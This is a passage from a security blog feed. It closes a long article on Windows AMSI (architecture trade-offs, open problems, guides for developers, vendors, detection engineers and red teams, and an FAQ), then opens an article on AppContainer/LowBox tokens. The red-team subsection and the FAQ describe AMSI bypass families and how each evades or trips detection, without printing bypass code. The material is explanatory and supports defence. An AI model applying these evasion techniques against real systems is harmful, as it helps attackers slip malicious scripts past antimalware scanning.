&lt;p&gt;Why can AMSI not be moved into a &lt;a href=&quot;https://paragmali.com/blog/vbs-trustlets-what-actually-runs-in-the-secure-kernel/&quot; rel=&quot;noopener&quot;&gt;VBS Trustlet&lt;/a&gt; (the isolated, kernel-attested user-mode environment that Hyper-V&apos;s Virtual Secure Mode hosts)? Latency. A Trustlet call is a VTL switch: the CPU takes a VMEXIT into the hypervisor, saves and restores the VMCS, and returns into VTL1; the Hyper-V Top-Level Functional Specification documents the mechanism as a hypercall (Microsoft TLFS: Virtual Secure Mode [@tlfs-vsm]). AMSI is on the hot path of every script statement: PowerShell calls &lt;code&gt;AmsiScanBuffer&lt;/code&gt; per command, Office VBA calls it per trigger, .NET calls it per &lt;code&gt;Assembly.Load&lt;/code&gt;. Multiplying every per-statement scan by a VTL round trip is unacceptable. The same-process design is a deliberate latency-versus-isolation trade-off, made in 2015 and confirmed every year since.&lt;/p&gt;
&lt;p&gt;Why can AMSI not be moved out-of-process to a broker? Same answer: the broker&apos;s RPC round trip puts process context switches and ALPC marshalling on the same per-statement hot path. And a broker introduces a different problem: an in-process attacker could prevent the host from speaking to the broker (close the RPC handle, replace the proxy, set a hardware breakpoint on the marshalling thunk). The attack surface is not reduced; it is moved.&lt;/p&gt;

The pragmatic alternative to &quot;AMSI as a security boundary&quot; is *defense in depth across three trust models*, which is what Microsoft has actually shipped:&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;The synchronous gate.&lt;/strong&gt; AMSI in-process. Beats the unprivileged-payload case. Cannot be a boundary because of the latency math above.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The ETW correlation seam.&lt;/strong&gt; The &lt;code&gt;Microsoft-Antimalware-Scan-Interface&lt;/code&gt; provider emits the buffer to whoever can read it. Beats the in-process bypass case, because the ETW emit happens before the bypass-clobbered return [@ethicalchaos].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The policy-denial layer.&lt;/strong&gt; Constrained Language Mode under WDAC User Mode Code Integrity, and the &quot;Block Macros from Internet&quot; default. These do not scan content; they refuse to run it [@ps-clm] [@internet-macros-blocked].&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The three together cover the cases AMSI alone cannot. Each one is weak alone. None of them is a security boundary in MSRC&apos;s strict sense; together, they cover the operational space.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;Now we know what AMSI is, what it is not, and how attackers have spent seven years stress-testing the difference. What is left unsolved?&lt;/p&gt;
&lt;h2&gt;10. Open Problems: The 2026 Frontier&lt;/h2&gt;
&lt;p&gt;Fred Cohen proved in 1984 that general virus detection is undecidable: &quot;In general, detection of a virus is shown to be undecidable both by a priori and runtime analysis, and without detection, cure is likely to be difficult or impossible&quot; [@cohen-1984]. AMSI does not try to solve Cohen&apos;s problem. AMSI solves an adjacent problem -- given a deobfuscated buffer, does it match patterns a provider has seen? -- which is finite-state and tractable. The first is impossible. The second is the only thing that has ever worked.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; AMSI does not try to solve the undecidable problem of &quot;is this program malicious?&quot;. It solves a tractable adjacent problem: &quot;does this deobfuscated buffer match patterns we have seen?&quot;. The first is theoretically impossible (Cohen 1984). The second is the only thing that has ever scaled.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The empirical upper bound on the second problem is now known. Danny Hendler, Shay Kels, and Amir Rubin&apos;s 2020 ACM AsiaCCS paper, &lt;em&gt;Detecting Malicious PowerShell Commands using Deep Neural Networks&lt;/em&gt; [@hendler-msr], reports on AMSI-collected PowerShell: &quot;Our best-performing model uses an architecture that enables the processing of textual signals from both the character and token levels and obtains a true-positive rate of nearly 90% while maintaining a low false-positive rate of less than 0.1%.&quot; The arXiv preprint carries the same headline figures [@hendler-arxiv]. About 90 percent true positive at under 0.1 percent false positive is the practical ceiling on AMSI-side classification. It is much better than every pre-AMSI defender alone, and it is still 10 percent away from perfect. Cohen&apos;s lower bound on the &lt;em&gt;general&lt;/em&gt; problem means perfect is not on offer; the question is what fraction of the residual 10 percent the next ten years close.&lt;/p&gt;

flowchart TD
    A[AMSI in 2026: open problems]
    A --&amp;gt; B[Patchless bypass detection without PPL]
    A --&amp;gt; C[Non-Microsoft script runtimes Python Node Ruby]
    A --&amp;gt; D[AMSI for AI-runtime LLM-generated code]
    A --&amp;gt; E[Cross-runtime correlation single chain]
    A --&amp;gt; F[IAmsiStream adoption beyond scripts]
    A --&amp;gt; G[AMSI on Linux macOS especially dotnet]&lt;pre&gt;&lt;code&gt;B -.user-mode-only detection requires polling.-&amp;gt; B1[Open: no general solution]
C -.PEP-578 audit hooks architecturally similar.-&amp;gt; C1[Open: no production bridge]
D -.does content-scan even apply to LLM output.-&amp;gt; D1[Open: design problem]
E -.no correlation_id joins macro-PowerShell-dotnet.-&amp;gt; E1[Open: per-host-app scope]
F -.designed for adoption but adoption thin.-&amp;gt; F1[Open: market problem]
G -.no shared script-engine host model.-&amp;gt; G1[Open: platform problem]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Open problem 1: patchless hardware-breakpoint bypass on unprivileged user-mode EDR.&lt;/strong&gt; The Outflank 2020 technique still works against EDR products that lack any kernel-side ETW consumer for thread-context writes [@crowdstrike-veh]. CrowdStrike&apos;s recommended detector, &lt;code&gt;Microsoft-Windows-Kernel-Audit-API-Calls&lt;/code&gt;, is available to admin-side consumers without an Antimalware-PPL gate; &lt;code&gt;Microsoft-Windows-Threat-Intelligence&lt;/code&gt; is the stricter alternative for the remote-thread-context subset. The conjecture, stated bluntly: no reliable fully-unprivileged user-mode-only detection of the patchless bypass exists. Any such detection would have to either poll the debug registers (which defeats the bypass&apos;s whole point) or hook the syscalls the bypass uses (which any in-process bypass can in turn defeat). The path forward is to make kernel-ETW consumption table stakes for any serious EDR product on Windows; the path is administrative, not architectural.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Open problem 2: non-Microsoft script runtimes.&lt;/strong&gt; Python, Node.js, Ruby, Lua, and the JavaScript hosts embedded in WebView2 are all script-execution surfaces that AMSI does not see. Python&apos;s PEP-578 audit hooks are architecturally similar to AMSI: a callback the runtime invokes at security-relevant events. No production AMSI bridge for Python ships from Microsoft or from any major Python distributor. The architectural reason is that AMSI&apos;s contract assumes a host that has a clear &quot;about to execute deobfuscated content&quot; moment; not every runtime presents that moment to the OS in a way an external provider can intercept.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Open problem 3: AMSI for AI-runtime / LLM-generated code.&lt;/strong&gt; When Copilot or AutoGen agents generate code that an automated runner executes, is &lt;code&gt;AmsiScanBuffer&lt;/code&gt; the right seam for inspection? The architectural question is harder than the engineering one: do content-scan signatures even apply to LLM-generated code at all? The empirical answer is unknown, and the public AMSI corpus (§8 above, plus the Hendler/Kels/Rubin character- and token-level model from §10) is built on the obfuscation artefacts of human-authored attacks; whether the same signal shape persists when the author is a language model is itself the open research question. A different seam, closer to &quot;policy at agent-execution time,&quot; may be the right model.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Open problem 4: cross-runtime correlation.&lt;/strong&gt; Today, each AMSI integration sees its slice of the attack. Office VBA sees the trigger buffer. PowerShell sees the deobfuscated command line. .NET sees the in-memory assembly. The provider can correlate calls within one &lt;code&gt;HAMSISESSION&lt;/code&gt;, but no single &lt;code&gt;correlation_id&lt;/code&gt; joins Office VBA&apos;s session to the PowerShell session it spawns to the .NET assembly that PowerShell loads. A SOC analyst piecing together the chain joins on parent process ID and timestamp; the join is fragile.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Open problem 5: &lt;code&gt;IAmsiStream&lt;/code&gt; adoption beyond script engines.&lt;/strong&gt; &lt;code&gt;IAmsiStream&lt;/code&gt; was designed for non-script content -- IM messages, downloaded plugins, BLOB attachments -- but the demand from non-script applications never materialized. The interface is ready; the integrations are not. This one is a market problem, not an architectural one, and there is no obvious actor whose interest is to fix it.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Open problem 6: AMSI on Linux and macOS.&lt;/strong&gt; PowerShell 7 runs on Linux. .NET runs on Linux. The same &lt;code&gt;Assembly.Load(byte[])&lt;/code&gt; attack surface that drove .NET 4.8&apos;s AMSI integration exists in CoreCLR, unwatched. No equivalent of AMSI ships outside Windows. Partly that is platform: every Python and Node install on Linux is essentially its own host with its own life cycle, and there is no shared script-engine model the way &lt;code&gt;amsi.dll&lt;/code&gt; provides on Windows. Partly it is economics: the large-customer demand that drove every Windows AMSI integration since 2015 has not assembled on the other side. The PowerShell team&apos;s path forward is uncertain.&lt;/p&gt;
&lt;p&gt;If you build, hunt, attack, or defend on Windows, AMSI is not optional reading. The next section is the Monday-morning answer for each of those four roles.&lt;/p&gt;
&lt;h2&gt;11. Practical Guide: For Four Roles on Monday Morning&lt;/h2&gt;
&lt;p&gt;The rest of this section is the action-oriented closing. One numbered subsection per audience. Skip to the one that applies to you.&lt;/p&gt;
&lt;h3&gt;11.1 For an application developer&lt;/h3&gt;
&lt;p&gt;You ship a Windows application that hosts a scripting engine, an automation surface, or a plug-in loader. Here is the minimum-viable AMSI integration. The call lifecycle is exactly five functions plus one cleanup pair.&lt;/p&gt;

# Pseudocode against the Win32 flat-C AMSI surface in amsi.dll.
# A real implementation would use C++ or Rust with the actual amsi.h
# types. The lifecycle and error handling are the load-bearing parts.&lt;p&gt;amsi = ctypes.WinDLL(&quot;amsi.dll&quot;)&lt;/p&gt;
1. Once at startup. appName is what shows up in DeviceEvents.AmsiProcessName.
&lt;p&gt;ctx = HAMSICONTEXT()
hr = amsi.AmsiInitialize(&quot;MyApp_v3.2&quot;, byref(ctx))
if hr != S_OK:
    raise OSError(hr)&lt;/p&gt;
&lt;p&gt;try:
    # 2. Once per logical user command (NOT once per buffer).
    session = HAMSISESSION()
    hr = amsi.AmsiOpenSession(ctx, byref(session))
    if hr != S_OK:
        raise OSError(hr)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;try:
    # 3. Once per buffer. The contentName is what the SOC analyst sees.
    result = AMSI_RESULT()
    hr = amsi.AmsiScanBuffer(
        ctx, buffer, len(buffer), &quot;user-script.ps1&quot;, session, byref(result))
    if hr != S_OK:
        raise OSError(hr)

    # 4. Interpret the verdict.
    if amsi.AmsiResultIsMalware(result):
        raise SecurityException(&quot;AMSI flagged the content as malicious&quot;)

finally:
    # 5. Always close the session.
    amsi.AmsiCloseSession(ctx, session)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;finally:
    # 6. Always uninitialize at shutdown.
    amsi.AmsiUninitialize(ctx)
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;The four common bugs to avoid: forgetting &lt;code&gt;AmsiUninitialize&lt;/code&gt; (the handle leaks until the process dies); sharing one &lt;code&gt;HAMSISESSION&lt;/code&gt; across threads (the correlation breaks and the provider sees one giant interleaved logical command); ignoring &lt;code&gt;AMSI_RESULT_DETECTED&lt;/code&gt; (defeats the entire point of integrating); and passing a meaningless &lt;code&gt;contentName&lt;/code&gt; (every SOC analyst hunting your application will quietly curse you).&lt;/p&gt;
&lt;h3&gt;11.2 For an AV or EDR vendor implementing a provider&lt;/h3&gt;
&lt;p&gt;If you are an AV vendor, the Microsoft Windows-classic-samples AmsiProvider [@amsi-sample] is your starting point. The skeleton: &lt;code&gt;DllRegisterServer&lt;/code&gt; writes the two registry trees (the CLSID tree under &lt;code&gt;HKLM\SOFTWARE\Classes\CLSID&lt;/code&gt; and the AMSI opt-in tree under &lt;code&gt;HKLM\SOFTWARE\Microsoft\AMSI\Providers&lt;/code&gt;); the IClassFactory boilerplate creates an instance; &lt;code&gt;IAntimalwareProvider::Scan&lt;/code&gt; consumes the &lt;code&gt;IAmsiStream&lt;/code&gt; and bridges it to your scan engine [@amsi-devaudience].&lt;/p&gt;
&lt;p&gt;Three operational gotchas that have bitten every vendor at least once:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Load dependencies with full paths.&lt;/strong&gt; Windows 10 1709&apos;s DLL-hijack mitigation refuses unqualified &lt;code&gt;LoadLibrary&lt;/code&gt; calls from AMSI provider DLLs. Use full paths for every secondary DLL your provider loads [@amsi-devaudience].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Authenticode-sign your provider.&lt;/strong&gt; Windows 10 1903&apos;s optional signing check at &lt;code&gt;HKLM\SOFTWARE\Microsoft\AMSI\FeatureBits = 0x2&lt;/code&gt; refuses unsigned providers. Many enterprise customers set that bit by policy.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;ThreadingModel must be &lt;code&gt;Both&lt;/code&gt;.&lt;/strong&gt; Marshaling proxies break the in-process performance assumption.&lt;/li&gt;
&lt;/ol&gt;

Defender inherits a legacy contract from the IOfficeAntiVirus era: when a full third-party AV registers itself as the active antimalware provider, Defender unregisters itself as the active AV and remains as a passive scanner. AMSI is the modern instance of that contract. Your registered provider becomes the active AV slot; Defender steps aside. The flip is not silent: Defender logs the transition, and admin tools display the new active AV in Windows Security Center. If you are the registered provider and Defender is *not* yielding, recheck your registration (both registry trees, signing, and that your provider&apos;s `IAntimalwareProvider::DisplayName` returns a non-empty string).
&lt;h3&gt;11.3 For a detection engineer&lt;/h3&gt;
&lt;p&gt;The two-pronged hunt: query the cloud telemetry (&lt;code&gt;DeviceEvents&lt;/code&gt; in Defender XDR) for the wide net, and run an on-host ETW consumer (SilkETW or Sealighter against GUID &lt;code&gt;{2A576B87-09A7-520E-C21A-4942F0271D67}&lt;/code&gt;) for the air-gapped and high-value hosts. The KQL pattern in §7 is the cloud-side join; the on-host consumer is documented in the &lt;code&gt;AMSIScriptDetections.md&lt;/code&gt; hunting pack [@bertjan-amsi-queries].&lt;/p&gt;
&lt;p&gt;Bonus rule: deploy a gap-detection alert. &quot;Any &lt;code&gt;powershell.exe&lt;/code&gt; process alive longer than 60 seconds with more than five &lt;code&gt;ProcessCommandLine&lt;/code&gt; entries and zero &lt;code&gt;AmsiScriptDetection&lt;/code&gt; events&quot; is a high-signal pattern across every bypass family in §8, including the patchless ones. It does not detect the &lt;em&gt;bypass&lt;/em&gt;; it detects the &lt;em&gt;result&lt;/em&gt; of the bypass, which is silence where there should be sound.&lt;/p&gt;
&lt;h3&gt;11.4 For a red-team operator&lt;/h3&gt;
&lt;p&gt;The viability of each bypass family in 2026 against fully-patched Windows 11 23H2 with Defender for Endpoint and a PPL-onboarded EDR is:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;AmsiUtils.amsiInitFailed&lt;/code&gt;: dead. String signature still in place; Sophos reports about 1 percent detection share in 2021, which means roughly 1 percent of commodity actors still ship the literal bypass and get caught [@sophos-bypasses].&lt;/li&gt;
&lt;li&gt;In-process &lt;code&gt;AmsiScanBuffer&lt;/code&gt; patch: dead. Byte-pattern signature plus behavior signature on writes to &lt;code&gt;amsi.dll&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Provider COM-hijack: dead. 1903 signing requirement plus 1709 DLL-hijack mitigation.&lt;/li&gt;
&lt;li&gt;Hardware-breakpoint VEH (Outflank 2020 family): generates &lt;code&gt;Microsoft-Windows-Kernel-Audit-API-Calls&lt;/code&gt; &lt;code&gt;NtSetContextThread&lt;/code&gt; events to any admin-side ETW consumer; the stricter &lt;code&gt;Microsoft-Windows-Threat-Intelligence&lt;/code&gt; event fires only on remote-thread writes, so the in-thread variant is invisible to EtwTi but visible without PPL [@crowdstrike-veh].&lt;/li&gt;
&lt;li&gt;CLR-DLL patch (Practical Security Analytics, 2021): niche; the &lt;code&gt;Microsoft-Windows-DotNETRuntime&lt;/code&gt; ETW correlation closes most variants.&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Even when a bypass succeeds against the synchronous &lt;code&gt;AmsiScanBuffer&lt;/code&gt; return, the ETW provider still emits from inside the prologue. If your goal is silence rather than evasion, you need a bypass that prevents &lt;code&gt;amsi.dll&lt;/code&gt; from loading at all, and most modern hosts will not let you. The trade between &quot;I bypassed AMSI&quot; and &quot;I left no telemetry&quot; is rarely the same trade.&lt;/p&gt;
&lt;/blockquote&gt;

Even surviving 2026-viable bypasses emit telemetry that compounds: a provider COM-hijack attempt generates an unsigned-load failure in the Windows event log; a hardware-breakpoint VEH bypass generates an `NtSetContextThread` event in `Microsoft-Windows-Kernel-Audit-API-Calls` (and in `Microsoft-Windows-Threat-Intelligence` on the remote-thread subset); a CLR-DLL patch generates a clr.dll-write event in the kernel-mode memory-protection telemetry. The &quot;I bypassed AMSI&quot; cost is one event; the &quot;I bypassed AMSI invisibly&quot; cost is many. On a high-assurance target where the SOC is hunting on the gap and the EDR has PPL onboarded, the risk-adjusted return on most known bypasses is negative.
&lt;p&gt;AMSI is, in the end, a covenant. The script engine promises to phone home before it runs your code. The defender promises to listen. Everyone -- attacker, defender, developer, AV vendor -- has spent ten years arguing about the terms.&lt;/p&gt;
&lt;h2&gt;12. FAQ&lt;/h2&gt;

No. Per Microsoft&apos;s published Windows Security Servicing Criteria [@msrc-criteria], AMSI is not classified as a security boundary, which means AMSI-bypass bugs are not serviced as security vulnerabilities. The Microsoft Security Response Center&apos;s response to CyberArk Labs (reproduced in the May 2018 redux disclosure [@cyberark-redux]) is verbatim: &quot;the AMSI was not designed to prevent such attacks.&quot; See §9 for the architectural reasoning.

No. `MpOav.dll` loads *into the calling process* (`powershell.exe`, `winword.exe`, `wscript.exe`), not into `MsMpEng.exe`. The PPL hardening protects `MsMpEng.exe`&apos;s process from tampering, but it does not extend to the AMSI provider DLL that gets loaded into the script host&apos;s memory space [@redcanary-amsi].

Because AMSI&apos;s trust model assumes the host process is benign. A non-admin who has code execution inside a non-PPL host can patch the host&apos;s own memory (Era 2) or flip the host&apos;s own managed state via reflection (Era 1). Neither requires admin. Hardening AMSI against the unprivileged in-process attacker would require moving AMSI out of the host process, which would defeat its latency and post-deobfuscation-visibility design. See §9 [@mdsec-evasion].

The decrypted one. AMSI is called *after* `[Convert]::FromBase64String`, after XOR, after string concatenation, and after `Invoke-Expression` argument construction. The host hands AMSI the buffer that the executor was about to run. That is the entire point of the design [@holmes-2015-wayback].

No. AMSI catches `Assembly.Load(byte[])` since .NET Framework 4.8 (April 2019) [@dotnet-48]. It does *not* catch `DynamicMethod` [@dotnet-dynamicmethod] emission via `System.Reflection.Emit`, because there is no PE-load event to anchor a scan on; the IL is built up byte by byte inside the CLR. Detection of `Reflection.Emit` abuse falls under the broader &quot;Reflection&quot; bypass family Trend Micro catalogues separately from the in-memory `AmsiScanBuffer` patch family [@trendmicro-bypass].

A combination of architectural and platform reasons. Architecturally, Linux and macOS do not have a shared script-engine host model; every Python, Node.js, Ruby, and Perl install is essentially its own host. Platform-wise, the demand for an out-of-the-box scan-interface contract has not materialized, even though PowerShell 7 and .NET Core both run on Linux. See §10 for the structural argument.

AMSI is synchronous and can block; ETW is asynchronous and observation-only. Both surface the same data (the post-deobfuscation buffer) and the same provider verdict. AMSI is for *decisions* (the host refuses to run flagged content). The `Microsoft-Antimalware-Scan-Interface` ETW provider with GUID `{2A576B87-09A7-520E-C21A-4942F0271D67}` is for *correlation* and *gap detection* (the SOC can see the scan happened even when an in-process bypass mutes the synchronous return) [@etw-manifest].
&lt;p&gt;&lt;strong&gt;Key terms.&lt;/strong&gt; AMSI; &lt;code&gt;AmsiScanBuffer&lt;/code&gt;; &lt;code&gt;AmsiInitialize&lt;/code&gt;; &lt;code&gt;AmsiOpenSession&lt;/code&gt;; &lt;code&gt;HAMSISESSION&lt;/code&gt;; &lt;code&gt;AMSI_RESULT_DETECTED&lt;/code&gt; (32768); AMSI provider; &lt;code&gt;MpOav.dll&lt;/code&gt;; CLSID &lt;code&gt;{2781761E-28E0-4109-99FE-B9D127C57AFE}&lt;/code&gt;; ETW provider &lt;code&gt;{2A576B87-09A7-520E-C21A-4942F0271D67}&lt;/code&gt;; trigger-buffer architecture; Script Block Logging (Event 4104); &lt;code&gt;amsiInitFailed&lt;/code&gt;; Antimalware-PPL; &lt;code&gt;Microsoft-Windows-Threat-Intelligence&lt;/code&gt; (EtwTi); Constrained Language Mode.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Review questions.&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Why is &lt;code&gt;IOfficeAntiVirus&lt;/code&gt; (Office 97) architecturally unable to catch a VBA macro that does &lt;code&gt;Application.Run&lt;/code&gt; of a string decoded from a worksheet cell, even when the decoded string is malicious? (§3)&lt;/li&gt;
&lt;li&gt;State the design intent Lee Holmes named in his June 9, 2015 disclosure in one sentence. Then explain why &quot;the engine can see the actual code that will be passed to be evaluated&quot; makes the obfuscation arms race obsolete on the AMSI side specifically. (§4)&lt;/li&gt;
&lt;li&gt;Walk through every step of &lt;code&gt;AmsiInitialize&lt;/code&gt; -&amp;gt; &lt;code&gt;AmsiOpenSession&lt;/code&gt; -&amp;gt; &lt;code&gt;AmsiScanBuffer&lt;/code&gt; -&amp;gt; &lt;code&gt;AmsiResultIsMalware&lt;/code&gt; -&amp;gt; &lt;code&gt;AmsiCloseSession&lt;/code&gt; -&amp;gt; &lt;code&gt;AmsiUninitialize&lt;/code&gt; for one PowerShell command. What happens at each step, and which field in the &lt;code&gt;DeviceEvents&lt;/code&gt; table does each parameter map to? (§5, §6)&lt;/li&gt;
&lt;li&gt;Why does AMSI&apos;s same-process design produce both its capability (post-deobfuscation visibility) and its failure mode (in-process bypass)? What two trust assumptions make AMSI valuable anyway? (§5, §9)&lt;/li&gt;
&lt;li&gt;For each of the six bypass eras in §8, state the technique in one sentence, the defender response in one sentence, and the era&apos;s residual viability against Windows 11 23H2 plus Defender in 2026.&lt;/li&gt;
&lt;li&gt;Why does the &lt;code&gt;Microsoft-Antimalware-Scan-Interface&lt;/code&gt; ETW provider&apos;s prologue emit survive the patchless hardware-breakpoint bypass that mutes the synchronous &lt;code&gt;AmsiScanBuffer&lt;/code&gt; return? (§7, §8 Era 5)&lt;/li&gt;
&lt;li&gt;What is the role of Cohen&apos;s 1984 undecidability result in framing AMSI&apos;s open problems for 2026? Why does it justify the Hendler/Kels/Rubin ~90 percent / &amp;lt;0.1 percent ceiling rather than refuting it? (§10)&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;strong&gt;Further reading.&lt;/strong&gt; Lee Holmes, &lt;em&gt;Windows 10 to offer application developers new malware defenses&lt;/em&gt; [@holmes-2015-wayback] (June 9, 2015). Microsoft Office 365 Threat Research, &lt;em&gt;Office VBA + AMSI: Parting the veil on malicious macros&lt;/em&gt; [@msec-vba-amsi-2018] (September 12, 2018). Gimpel and Ben Porat, &lt;em&gt;AMSI Bypass: Patching Technique&lt;/em&gt; [@cyberark-patching] (CyberArk Labs, February 2018). Hendler, Kels, and Rubin, &lt;em&gt;Detecting Malicious PowerShell Commands using Deep Neural Networks&lt;/em&gt; [@hendler-arxiv] (ACM AsiaCCS 2020). Microsoft Windows-classic-samples AmsiProvider [@amsi-sample] (reference provider implementation).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Citation availability.&lt;/strong&gt; Two original primary sources cited by the historical record for §8 are not currently accessible from non-browser clients and are therefore omitted as live URLs from this article&apos;s reference set; all load-bearing technique mechanics, attributions, and dates are preserved through accessible secondary sources. (a) Cornelis de Plaa&apos;s Outflank post of January 29, 2020 on the hardware-breakpoint VEH bypass (outflank.nl, &quot;Bypassing AMSI by manipulating the AMSI scan results&quot;) is no longer reachable from non-browser clients and has no Wayback snapshot; the technique&apos;s mechanics, January 29, 2020 publication date, and Outflank/Cneelis attribution are reproduced verbatim by EthicalChaos (April 2022) [@ethicalchaos], CrowdStrike (2024) [@crowdstrike-veh], and Trend Micro (December 2022) [@trendmicro-bypass]. (b) Matt Graeber&apos;s May 2016 &lt;code&gt;amsiInitFailed&lt;/code&gt; tweet sits behind the Twitter/X login wall; the tweet body, the May 2016 date, and the &lt;code&gt;amsiInitFailed&lt;/code&gt; reflection technique are reproduced verbatim by Sophos (June 2021) [@sophos-bypasses] (&quot;In May of 2016, PowerShell hacker Matt Graeber published a one-line AMSI evasion in a tweet&quot;) and MDSec (June 2018) [@mdsec-evasion] (full decompilation of the targeted private static field). Readers can reach every load-bearing primary source for both Era 1 (&lt;code&gt;amsiInitFailed&lt;/code&gt;) and Era 5 (hardware-breakpoint VEH) via the corroborating links above.&lt;/p&gt;

</content:encoded><category>amsi</category><category>windows-security</category><category>defender</category><category>powershell</category><category>malware-detection</category><category>etw</category><category>bypass-arms-race</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>AppContainer and LowBox Tokens: Windows&apos;s Capability Sandbox</title><link>https://paragmali.com/blog/appcontainer-and-lowbox-tokens-windowss-capability-sandbox/</link><guid isPermaLink="true">https://paragmali.com/blog/appcontainer-and-lowbox-tokens-windowss-capability-sandbox/</guid><description>How a single bit in Windows&apos;s access token, two new SID alphabets, and a per-package namespace partition let the kernel give two co-tenanted apps opposite verdicts.</description><pubDate>Tue, 12 May 2026 00:00:00 GMT</pubDate><content:encoded>
Windows&apos;s modern application sandbox rests on a single kernel primitive (*AppContainer / LowBox*) that Microsoft preserved under two names: *LowBox* inside the kernel and the `NtCreateLowBoxToken` syscall, *AppContainer* in the public API. One bit in `_TOKEN.Flags`, two new SID alphabets (`S-1-15-2-*` for packages, `S-1-15-3-*` for capabilities), and a per-package partition of the Object Manager namespace let `SeAccessCheck` give two co-tenanted processes opposite verdicts. UWP apps, MSIX-packaged desktop apps, Microsoft Edge LPAC renderers, and Windows Sandbox all rest on this primitive. James Forshaw&apos;s twelve-year exploit-research line shaped its current hardening.
&lt;h2&gt;1. Two Calculators&lt;/h2&gt;
&lt;p&gt;Open &lt;code&gt;calc.exe&lt;/code&gt; on a stock Windows 11 25H2 installation. It is the Microsoft Store calculator, the UWP one, the one Windows ships in the default Start menu. Now download the legacy &lt;code&gt;win32calc.exe&lt;/code&gt; from a Windows 7 image and run it side by side. Same user. Same machine. Same disk, same DACLs on every file in your profile. The Mandatory Integrity Control label on &lt;code&gt;%USERPROFILE%\.ssh\id_ed25519&lt;/code&gt; is the default Medium for both processes&apos; access checks.&lt;/p&gt;
&lt;p&gt;Yet &lt;code&gt;win32calc.exe&lt;/code&gt; can read the SSH private key, and &lt;code&gt;calc.exe&lt;/code&gt; cannot. If you open both processes in Sysinternals Process Explorer and compare the Security tab side by side, every field that the classic Windows NT token model exposes looks identical. User SID: identical. Logon ID: identical. Primary group: identical. Privileges: identical. Even the integrity level, by the read path, looks the same on the user&apos;s profile files.&lt;/p&gt;
&lt;p&gt;The difference is one bit. In the kernel&apos;s &lt;code&gt;_TOKEN&lt;/code&gt; structure, the &lt;code&gt;TOKEN_LOWBOX&lt;/code&gt; flag (SDK constant value &lt;code&gt;0x4000&lt;/code&gt;, the 15th bit of the &lt;code&gt;TokenFlags&lt;/code&gt; word) is set on the UWP &lt;code&gt;calc.exe&lt;/code&gt; token and clear on &lt;code&gt;win32calc.exe&lt;/code&gt; [@nostarch-wsi]. Microsoft&apos;s documentation calls the resulting token an &lt;em&gt;AppContainer token&lt;/em&gt;; the kernel call that creates it preserved the older marketing name. &quot;AppContainer was originally named &lt;em&gt;LowBox&lt;/em&gt; (prior to the release of Windows 8). That legacy name can be seen in API names such as &lt;strong&gt;NtCreateLowBoxToken&lt;/strong&gt;&quot; [@ms-learn-legacy].&lt;/p&gt;

AppContainer was originally named _LowBox_ (prior to the release of Windows 8). That legacy name can be seen in API names such as **NtCreateLowBoxToken**. -- Microsoft Learn

The public-API name for a kernel-enforced per-application sandbox introduced in Windows 8 [@ms-learn-legacy]. An AppContainer process runs under a *LowBox token*, a special access token whose `LowBoxToken` flag, package SID, capability SIDs, and per-instance number cause the Security Reference Monitor to apply additional access-check rules beyond the classic user-and-groups DACL walk. The kernel-internal name *LowBox* is preserved in `NtCreateLowBoxToken` and several adjacent symbol names [@ms-learn-ntcreatelowboxtoken].
&lt;p&gt;If you read the eight sub-authorities of the Calculator&apos;s package SID -- something like &lt;code&gt;S-1-15-2-466767348-3739614953-2700836392-...&lt;/code&gt; (the trailing five sub-authorities are elided here) -- you are reading a deterministic SHA-256 hash of the &lt;a href=&quot;https://paragmali.com/blog/windows-app-identity-33-year-reinvention/&quot; rel=&quot;noopener&quot;&gt;package family name&lt;/a&gt;, sliced into eight 4-byte 32-bit sub-authorities [@ms-learn-derivesid] [@nostarch-wsi]. Every Windows 11 machine in the world derives the same SID for &lt;code&gt;Microsoft.WindowsCalculator_8wekyb3d8bbwe&lt;/code&gt;, and DACLs on the per-package data directories name precisely that SID. Section 5 will walk this in detail; for now, notice that the SID alphabet starts with &lt;code&gt;S-1-15-2&lt;/code&gt;, not the familiar &lt;code&gt;S-1-5-21&lt;/code&gt; of user SIDs. Microsoft introduced two new SID prefixes in Windows 8: &lt;code&gt;S-1-15-2-*&lt;/code&gt; for packages and &lt;code&gt;S-1-15-3-*&lt;/code&gt; for capabilities. Both live in identifier authority 15, the &lt;em&gt;App Package Authority&lt;/em&gt; [@ms-learn-well-known-sids].&lt;/p&gt;

flowchart TD
    A[User Alice opens id_ed25519] --&amp;gt; B{&quot;Is _TOKEN.Flags.LowBoxToken set?&quot;}
    B --&amp;gt;|&quot;No (win32calc.exe)&quot;| C[Classic SeAccessCheck&lt;br /&gt;against user + groups]
    B --&amp;gt;|&quot;Yes (UWP calc.exe)&quot;| D[LowBox access path&lt;br /&gt;add Package SID and&lt;br /&gt;Capability claims to check]
    C --&amp;gt; E[Read allowed]
    D --&amp;gt; F[Read denied:&lt;br /&gt;no fs:documentsLibrary capability]
